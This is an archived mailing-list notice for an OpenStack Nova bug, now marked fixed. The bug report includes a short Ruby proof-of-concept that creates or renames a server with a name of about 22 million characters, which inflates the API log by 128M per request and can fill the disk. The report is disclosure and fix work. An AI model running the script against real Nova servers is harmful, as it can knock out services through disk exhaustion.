← Back to team overview

yahoo-eng-team team mailing list archive

  1. yahoo-eng-team team
  2. Mailing list archive
  3. Message #21229

[Bug 962515] Re: PUT/POST of large server name's can increase nova API log file size massively

  Thread PreviousDate PreviousThread Next 
** Changed in: nova/diablo
       Status: Fix Committed => Fix Released

-- 
You received this bug notification because you are a member of Yahoo!
Engineering Team, which is subscribed to OpenStack Compute (nova).
https://bugs.launchpad.net/bugs/962515

Title:
  PUT/POST of large server name's can increase nova API log file size
  massively

Status in OpenStack Compute (Nova):
  Fix Released
Status in OpenStack Compute (nova) diablo series:
  Fix Released

Bug description:
  Using the following Ruby sample script I can increase the size of the
  Nova API log file 128M per POST:

  require 'rubygems'
  require 'openstack/compute'

  USERNAME=ENV['NOVA_USERNAME']
  API_KEY=ENV['NOVA_API_KEY']
  API_URL=ENV['NOVA_URL']

  bigboy = "0" * 22222222

  conn=OpenStack::Compute::Connection.new(:username => USERNAME, :api_key => API_KEY, :auth_url => API_URL, :service_type => 'compute', :retry_auth => false)
  conn.create_server(:name => bigboy, :imageRef => "8da06b6a-1ddd-4d4f-aa54-579e95b5e8b1", :flavorRef => 1)

  ------

  Similarly I can do the same thing with a PUT (server name update):

  conn=OpenStack::Compute::Connection.new(:username => USERNAME, :api_key => API_KEY, :auth_url => API_URL, :service_type => 'compute', :retry_auth => false)
  server=conn.server("695e8b03-aed1-40ab-81bc-8e7456c36215")
  server.update(:name => bigboy)

  ---

  Each of these requests will increase the Nova API log file size by
  128M per request:

  [root@nova1 ~]# du -hs /var/log/nova/api.log
  128M	/var/log/nova/api.log

  ---

  The root cause of the issue is that we rely on the Nova database
  column size to limit the size of the instance name. We should put in
  an API check on the instance name size/length before sending it off to
  the database.

  Additionally, as part of this fix I would also like to incorporate a
  simple request size limiting middleware into our API pipeline so that
  really large requests are invalid to begin with.

  ---

  This exploit could allow an authenticated user to run the Nova API
  server out of disk space.

  Nova's rate limiting middleware will help guard the number of POST and
  PUT requests a given user can make. The default POST limit to /servers
  is 50 per day. The PUT limit is however much higher at 10 per minute.
  Either of these could provide opportunities to run API servers out of
  disk space.

To manage notifications about this bug go to:
https://bugs.launchpad.net/nova/+bug/962515/+subscriptions
  Thread PreviousDate PreviousThread Next